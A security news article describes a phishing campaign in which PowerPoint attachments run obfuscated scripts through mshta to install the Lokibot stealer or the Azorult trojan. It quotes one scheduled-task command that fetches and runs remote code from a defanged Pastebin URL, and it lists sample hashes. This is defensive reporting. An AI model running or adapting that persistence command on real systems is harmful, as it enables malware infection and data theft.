A new malware campaign utilizes PowerPoint files to deliver the Lokibot info stealer or Azorult remote access trojan.

Security researchers from Appriver spotted the malware campaign that includes weaponized PowerPoint files.


PowerPoint Malware Infection Chain

The infection starts with a simple Email that has PowerPoint Files attached. To device victims, the weaponized PowerPoint files contain lyrics of popular Drake song hidden inside a PowerShell command.

PowerPoint malware
Email with attachments

Once the PowerPoint attachments opened, it runs heavily obfuscated visual basic script, the script utilizes Mshta.exe utility that executes Microsoft HTML Applications (HTA) for reaching a bitly shortened link.

Then it checks whether the Excel or Word is running, if they are running then it kills the process. Later it creates a scheduled task using Mshta.exe to check for Pastebin URL every 60 minutes.

“C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 60 /tn (+main+) /tr “mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr” /F

The Pastebin URL contains the encoded script of the samples, based on the victim’s the encodes script decides to download the Lokibot info stealer or Azorult remote access trojan.

“Once decoded, this translates into a PowerShell script that contains a reference to Drake’s “Keke Do You Love Me” lyrics. This attacker “Master X”, retrieved from the metadata inside the PowerPoint, had a sense of humor when he was creating the invoke-expression cmdlet,” reads Appriver blog post.

Powershell commands

Master X also obfuscates the download string as a method to get undetected by security monitoring tools. Here are the malware functions:

Lokibot – It is an information stealer malware, generally delivered through spam emails, capable of collecting information from a range of applications.

Azorult – First spotted in 2016, a trojan malware that harvests and exfiltrates data from the compromised system.

Indicators of Compromise

Lokibot Sample
sha256     80c10ee5f21f92f89cbc293a59d2fd4c01c7958aacad15642558db700943fa22
Azorult Sample
sha256  a3c8f58fd18e564ec11c247aede37b0be763d1fca46d0cbe5d032cf17e3a6bf3

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.